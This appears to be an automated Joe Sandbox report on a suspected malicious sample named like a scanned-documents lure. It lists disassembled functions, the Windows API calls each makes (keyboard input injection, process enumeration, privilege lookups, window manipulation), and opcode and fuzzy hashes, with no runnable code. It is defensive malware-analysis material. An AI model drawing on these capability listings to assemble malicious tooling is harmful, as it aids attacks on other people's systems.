                                                      • Instruction Fuzzy Hash: BC31CD72A2060AABDF25DF64DC81EEE7BA9EB41350F054268FC04D7251EB35DD64CBA0
                                                      Function 003152C1 Relevance: 6.1, APIs: 4, Instructions: 104windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00315352
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00315375
                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00315382
                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003153A8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: LongWindow$InvalidateMessageRectSend
                                                      • String ID:
                                                      • API String ID: 3340791633-0
                                                      • Opcode ID: ec10e109e724da2963a9388e4b39ac2af02974136c6ee97e05a0b1a1d0abcb81
                                                      • Instruction ID: a3ce2ba7f55f463bf4e2fa896fddb6192c8b2855f8c055193b86db88220a8b32
                                                      • Opcode Fuzzy Hash: ec10e109e724da2963a9388e4b39ac2af02974136c6ee97e05a0b1a1d0abcb81
                                                      • Instruction Fuzzy Hash: 9031C838A55A08EFEB3F9F14CC15BE87769AB8C390F595901F620971E1C7B09DC0AB51
                                                      Function 002EAB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 002EABF1
                                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 002EAC0D
                                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 002EAC74
                                                      • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 002EACC6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: KeyboardState$InputMessagePostSend
                                                      • String ID:
                                                      • API String ID: 432972143-0
                                                      • Opcode ID: c7f65596e68d519289e3df47ad0c2b8a4b25ea262931e8e0efee7963c122e52e
                                                      • Instruction ID: 4a8d5fb91faa576705b1c78dd17033fa49f469017b65e34c0545bcdf5d090c0a
                                                      • Opcode Fuzzy Hash: c7f65596e68d519289e3df47ad0c2b8a4b25ea262931e8e0efee7963c122e52e
                                                      • Instruction Fuzzy Hash: 44312C309A03996FEF35CF668C047FA7B656B89310FA8621BE485521D0C374A9A58752
                                                      Function 00317674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ClientToScreen.USER32(?,?), ref: 0031769A
                                                      • GetWindowRect.USER32(?,?), ref: 00317710
                                                      • PtInRect.USER32(?,?,00318B89), ref: 00317720
                                                      • MessageBeep.USER32(00000000), ref: 0031778C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Rect$BeepClientMessageScreenWindow
                                                      • String ID:
                                                      • API String ID: 1352109105-0
                                                      • Opcode ID: 8a33d8090bc4878a36b17a24eea927adf6fbc7ed87510dd9fe2d2830192d1e7d
                                                      • Instruction ID: b4fe9a20ef2cb7db8065621d76e8b817ac1efd9e37478d20dfb1ac12b8071306
                                                      • Opcode Fuzzy Hash: 8a33d8090bc4878a36b17a24eea927adf6fbc7ed87510dd9fe2d2830192d1e7d
                                                      • Instruction Fuzzy Hash: F2415A74A092149FCB1BCF58C894EE9B7F9BB4D355F1981A8E8149B2A1C730E981CB90
                                                      Function 003116DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetForegroundWindow.USER32 ref: 003116EB
                                                        • Part of subcall function 002E3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 002E3A57
                                                        • Part of subcall function 002E3A3D: GetCurrentThreadId.KERNEL32 ref: 002E3A5E
                                                        • Part of subcall function 002E3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,002E25B3), ref: 002E3A65
                                                      • GetCaretPos.USER32(?), ref: 003116FF
                                                      • ClientToScreen.USER32(00000000,?), ref: 0031174C
                                                      • GetForegroundWindow.USER32 ref: 00311752
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                      • String ID:
                                                      • API String ID: 2759813231-0
                                                      • Opcode ID: 08adb52b9b9764092e6010951e282c5644982a34ac58cd9a84721b9d6add157b
                                                      • Instruction ID: acfd1fd1932b1cb63ddfe42fef64a6c20fc061dd0d217a6716ea789f4b2ecca7
                                                      • Opcode Fuzzy Hash: 08adb52b9b9764092e6010951e282c5644982a34ac58cd9a84721b9d6add157b
                                                      • Instruction Fuzzy Hash: AB316E75D10148AFDB05EFAAC8858EEBBFDEF48304B5080AAE515E7251E7309E45CFA0
                                                      Function 002ED4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 002ED501
                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 002ED50F
                                                      • Process32NextW.KERNEL32(00000000,?), ref: 002ED52F
                                                      • CloseHandle.KERNEL32(00000000), ref: 002ED5DC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                      • String ID:
                                                      • API String ID: 420147892-0
                                                      • Opcode ID: 41a9b8d50925b652364075d3d5320bba135364c19210e98541280c8e49d3d922
                                                      • Instruction ID: 3c30c1b3af7255ca998f50987b57735b08022446b46f610746ed89834307b66c
                                                      • Opcode Fuzzy Hash: 41a9b8d50925b652364075d3d5320bba135364c19210e98541280c8e49d3d922
                                                      • Instruction Fuzzy Hash: 9231D4710583419FD301EF54C885ABFBBF8EF99344F94092DF581831A2EB719958CB92
                                                      Function 00318FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00299BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00299BB2
                                                      • GetCursorPos.USER32(?), ref: 00319001
                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,002D7711,?,?,?,?,?), ref: 00319016
                                                      • GetCursorPos.USER32(?), ref: 0031905E
                                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,002D7711,?,?,?), ref: 00319094
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                      • String ID:
                                                      • API String ID: 2864067406-0
                                                      • Opcode ID: 4db8d32d05eba2343bc34e6a3505a255b894f1234f9512ec4bac0c2845223fd4
                                                      • Instruction ID: b964e920779a212bb39a0e3e1b9898cad14e2de830ce18a083a271814ac6a1fd
                                                      • Opcode Fuzzy Hash: 4db8d32d05eba2343bc34e6a3505a255b894f1234f9512ec4bac0c2845223fd4
                                                      • Instruction Fuzzy Hash: D3216D35610118AFDB2ACF95C868FEA7BB9EB4E361F1440AAF90547261C7319D90DB60
                                                      Function 002ED2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetFileAttributesW.KERNEL32(?,0031CB68), ref: 002ED2FB
                                                      • GetLastError.KERNEL32 ref: 002ED30A
                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 002ED319
                                                      • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0031CB68), ref: 002ED376
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: CreateDirectory$AttributesErrorFileLast
                                                      • String ID:
                                                      • API String ID: 2267087916-0
                                                      • Opcode ID: 8fb5dafb6e79ced5cec41c3040b4adfbc8a8cd20f2362d88a0a40c47630ca599
                                                      • Instruction ID: 134764ae341df349927fb97828d2410e47ecd442d0140de8cfcafef8daa473db
                                                      • Opcode Fuzzy Hash: 8fb5dafb6e79ced5cec41c3040b4adfbc8a8cd20f2362d88a0a40c47630ca599
                                                      • Instruction Fuzzy Hash: A821F3745A92428FC700EF25C8804AEB7E8EE59324F904A5DF899C32E1D730C956CF83
                                                      Function 002E1571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 002E1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 002E102A
                                                        • Part of subcall function 002E1014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 002E1036
                                                        • Part of subcall function 002E1014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002E1045
                                                        • Part of subcall function 002E1014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 002E104C
                                                        • Part of subcall function 002E1014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002E1062
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 002E15BE
                                                      • _memcmp.LIBVCRUNTIME ref: 002E15E1
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002E1617
                                                      • HeapFree.KERNEL32(00000000), ref: 002E161E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                      • String ID:
                                                      • API String ID: 1592001646-0
                                                      • Opcode ID: 85f1a280012756a52258468bb15a3097f401ab752f0d4ae0283beb05710bdf09
                                                      • Instruction ID: fc6239608d38bdb696b53005a63dfc49fa167e44e399a6c2c535aefc9f3ad17d
                                                      • Opcode Fuzzy Hash: 85f1a280012756a52258468bb15a3097f401ab752f0d4ae0283beb05710bdf09
                                                      • Instruction Fuzzy Hash: 6B21A171EA0109EFDF00DFA5C945BEEB7B8EF44354F488469E445A7241D730AA25CBA0
                                                      Function 00312782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0031280A
                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00312824
                                                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00312832
                                                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00312840
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Window$Long$AttributesLayered
                                                      • String ID:
                                                      • API String ID: 2169480361-0
                                                      • Opcode ID: 60a126bd4dcd6928b087c5c6f512a17ec61f093f1a78f0d74299fd2c5eb67931
                                                      • Instruction ID: e034a0bbd128d28ab6151ce998229d19a61134bac402130102738285909ae695
                                                      • Opcode Fuzzy Hash: 60a126bd4dcd6928b087c5c6f512a17ec61f093f1a78f0d74299fd2c5eb67931
                                                      • Instruction Fuzzy Hash: 96210335205110AFD71A9B24CC44FEB7B99AF4A324F148158F4268B6E2CB71FCA2CBD0
                                                      Function 002E78F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 002E8D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,002E790A,?,000000FF,?,002E8754,00000000,?,0000001C,?,?), ref: 002E8D8C
                                                        • Part of subcall function 002E8D7D: lstrcpyW.KERNEL32(00000000,?), ref: 002E8DB2
                                                        • Part of subcall function 002E8D7D: lstrcmpiW.KERNEL32(00000000,?,002E790A,?,000000FF,?,002E8754,00000000,?,0000001C,?,?), ref: 002E8DE3
                                                      • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,002E8754,00000000,?,0000001C,?,?,00000000), ref: 002E7923
                                                      • lstrcpyW.KERNEL32(00000000,?), ref: 002E7949
                                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,002E8754,00000000,?,0000001C,?,?,00000000), ref: 002E7984
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: lstrcmpilstrcpylstrlen
                                                      • String ID: cdecl
                                                      • API String ID: 4031866154-3896280584
                                                      • Opcode ID: a25dba5e327860144ebbad41f8629608a0960a16d60f8cd44322bafa5f98032a
                                                      • Instruction ID: ab761b6c18bb42c1ce734318a82d9fa94b1db8d12bf782cb86e1e553f65b4b7a
                                                      • Opcode Fuzzy Hash: a25dba5e327860144ebbad41f8629608a0960a16d60f8cd44322bafa5f98032a
                                                      • Instruction Fuzzy Hash: 3F11293A260382ABCF155F35CC45E7A77A9FF49350B90802AF846C7265EB319821C751
                                                      Function 00315660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,00001060,?,00000004), ref: 003156BB
                                                      • _wcslen.LIBCMT ref: 003156CD
                                                      • _wcslen.LIBCMT ref: 003156D8
                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00315816
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: MessageSend_wcslen
                                                      • String ID:
                                                      • API String ID: 455545452-0
                                                      • Opcode ID: 78e6a43eb24ec22a04604ab1e1787098418fe6f6909d228a1257ddae1f74b677
                                                      • Instruction ID: c1583e920105fb14e471ee21eb73ad5fa9c6ae97fa7e1264862a515cb6641b9f
                                                      • Opcode Fuzzy Hash: 78e6a43eb24ec22a04604ab1e1787098418fe6f6909d228a1257ddae1f74b677
                                                      • Instruction Fuzzy Hash: BB11D371604608DADF269F65CC85AEE77ACEF99765F104026F915D6081EB70CAC4CFA0
                                                      Function 002E1A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 002E1A47
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002E1A59
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002E1A6F
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002E1A8A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: 44f8110bee0260566ac78118ca42f8b4b86c5e9575cd1e51ae7a201b6f392cfb
                                                      • Instruction ID: a8a4a271cb3c8cab7659dd20f543453cfeb6455771ba4b0c08292079d1ec75d0
                                                      • Opcode Fuzzy Hash: 44f8110bee0260566ac78118ca42f8b4b86c5e9575cd1e51ae7a201b6f392cfb
                                                      • Instruction Fuzzy Hash: E111393AD41219FFEB11DBA5CD85FADFB78EB08750F6000A1EA00B7294D6716E60DB94
                                                      Function 002EE1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentThreadId.KERNEL32 ref: 002EE1FD
                                                      • MessageBoxW.USER32(?,?,?,?), ref: 002EE230
                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 002EE246
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 002EE24D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                      • String ID:
                                                      • API String ID: 2880819207-0
                                                      • Opcode ID: dd14045ca51ad9c8d4d615ef5f02d7c94a0ac447ff7ca0987798da48a77c9b40
                                                      • Instruction ID: 50d78c044742b5be2dedec0d0756420b1e7f21814e92c99b98eb8cc3ceefdf28
                                                      • Opcode Fuzzy Hash: dd14045ca51ad9c8d4d615ef5f02d7c94a0ac447ff7ca0987798da48a77c9b40
                                                      • Instruction Fuzzy Hash: C8112B7AD54355BFCB029FA89C05BDE7FBCAB45311F008225F924D3291D6B4CD1487A0
                                                      Function 002AD1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateThread.KERNEL32(00000000,?,002ACFF9,00000000,00000004,00000000), ref: 002AD218
                                                      • GetLastError.KERNEL32 ref: 002AD224
                                                      • __dosmaperr.LIBCMT ref: 002AD22B
                                                      • ResumeThread.KERNEL32(00000000), ref: 002AD249
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                      • String ID:
                                                      • API String ID: 173952441-0
                                                      • Opcode ID: c277496614ff81e7c790e8f48a0e2429787be13cafbd25bc171c87c0d3e72aec
                                                      • Instruction ID: b38ba1a778da34d982480ff5b564ae9a4dca1adb9b5e28c3ad1e5bbb506c1fb9
                                                      • Opcode Fuzzy Hash: c277496614ff81e7c790e8f48a0e2429787be13cafbd25bc171c87c0d3e72aec
                                                      • Instruction Fuzzy Hash: E0014976474204BBC7116FA5DC09BAE7A6CDF83330F104229FC26924D1CF70C820CAA0
                                                      Function 0028600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0028604C
                                                      • GetStockObject.GDI32(00000011), ref: 00286060
                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 0028606A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1657541035.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                      • Associated: 00000000.00000002.1657524715.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.000000000031C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657587591.0000000000342000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657624265.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1657649717.0000000000354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_280000_Scanned Docs from Emnes Metal Sdn Bhd_.jbxd
                                                      Similarity
                                                      • API ID: CreateMessageObjectSendStockWindow
                                                      • String ID:
                                                      • API String ID: 3970641297-0
                                                      • Opcode ID: 351ecd7d4e783a412b133e2500ca6e872025d1d0c191558d6ed80db4e2929757
